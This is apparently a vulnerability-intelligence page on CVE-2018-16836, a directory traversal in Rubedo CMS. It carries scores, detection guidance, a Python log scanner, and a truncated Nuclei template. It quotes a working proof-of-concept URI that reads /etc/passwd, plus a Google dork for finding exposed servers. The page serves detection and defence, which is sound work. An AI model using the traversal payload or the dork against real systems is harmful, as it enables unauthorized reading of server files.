CVE-2018-16836
Published 2018-09-11
Priority: P187 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 61.44% (99.1th percentile)
Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rubedo_project | rubedo | <= 3.4.0 | — |
Detection & IOCs
url: /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
- Look for URL-encoded dot-dot sequences (%2e%2e) in HTTP GET requests targeting the /theme/default/img/ path, indicative of directory traversal attempts against Rubedo CMS.
- Exploit requires no authentication (unauthenticated attacker); alert on any unauthenticated GET request to /theme/ paths containing %2e%2e traversal sequences.
- Successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' (i.e., /etc/passwd contents); monitor HTTP responses from /theme/ endpoints for Unix passwd file patterns.
- Google Dork 'intext:rubedo.current.page.description' can be used to identify exposed Rubedo CMS instances for targeted scanning.
- The traversal path uses double-slash before /etc/passwd (//etc/passwd) in addition to URL-encoded %2e%2e sequences; detection rules must account for both encoding and the trailing double-slash pattern.
- The NVD advisory also shows a mixed encoding variant (%2e%2e/../) suggesting multiple traversal encoding styles may be used; detection should normalize and match both forms.
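The normalization the last two notes call for, as an added example (not code from any of the indexed sources): percent-decode the request target repeatedly, then look for a literal `..` path segment under /theme/. It goes one step beyond the page by also covering double-encoded input (%252e); the Combined Log Format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Request target and status code from a Combined Log Format line (assumed format).
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

def normalize(target, max_rounds=3):
    """Drop the query string and percent-decode until stable, so %2e%2e,
    %252e%252e and a literal .. all reduce to the same path."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(line):
    """Return None for lines of no interest, else 'attempt' or 'likely-success'."""
    m = LOG_RE.search(line)
    if not m:
        return None
    path = normalize(m["target"])
    if not path.lower().startswith("/theme/"):
        return None
    # Splitting on "/" keeps working when the path contains "//": the empty
    # segment is simply ignored and the ".." segments are still found.
    if ".." not in path.split("/"):
        return None
    # A 200 means the server returned a body; confirm against the response
    # content (passwd-style 'root:.*:0:0:') where bodies are captured.
    return "likely-success" if m["status"] == "200" else "attempt"

def scan(lines):
    return [(verdict, l) for l in lines if (verdict := classify(l))]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2018:10:00:00 +0000] "GET /theme/default/img/logo.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Sep/2018:10:00:05 +0000] "GET /theme/default/img/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [11/Sep/2018:10:00:06 +0000] "GET /theme/default/img/%2e%2e/..//etc/passwd HTTP/1.1" 404 162',
    '198.51.100.7 - - [11/Sep/2018:10:00:07 +0000] "GET /theme/default/img/%252e%252e//etc/passwd HTTP/1.1" 403 162',
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(verdict, line)
```
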
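CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |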
GHSA
GHSA-g38x-pgq9-cf49: Rubedo through 3
ghsa_unreviewed · 2022-05-13
CVE-2018-16836 [CRITICAL] CWE-22
VulnCheck
rubedo_project rubedo Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck · 2018 · CVSS 9.8
CVE-2018-16836 [CRITICAL]
Affected: rubedo_project rubedo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2018-16836
No detection rules found.
Exploit-DB
Rubedo CMS 3.4.0 - Directory Traversal
exploitdb · 2018-09-12 · CVSS 9.8
CVE-2018-16836 [CRITICAL]
---
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836
# PoC:
# Read /etc/passwd file from remote server
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
Nuclei
Rubedo CMS <=3.4.0 - Directory Traversal
nuclei · CVSS 9.8
CVE-2018-16836 [CRITICAL]
Rubedo CMS =3.4.1) or apply the provided security patch.
```yaml
  reference:
    - https://www.exploit-db.com/exploits/45385
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16836
    - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
    - https://www.exploit-db.com/exploits/45385/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16836
    cwe-id: CWE-22
    epss-score: 0.89691
    epss-percentile: 0.99565
    cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubedo_project
    product: rubedo
  tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2
```
No writeups or analysis indexed.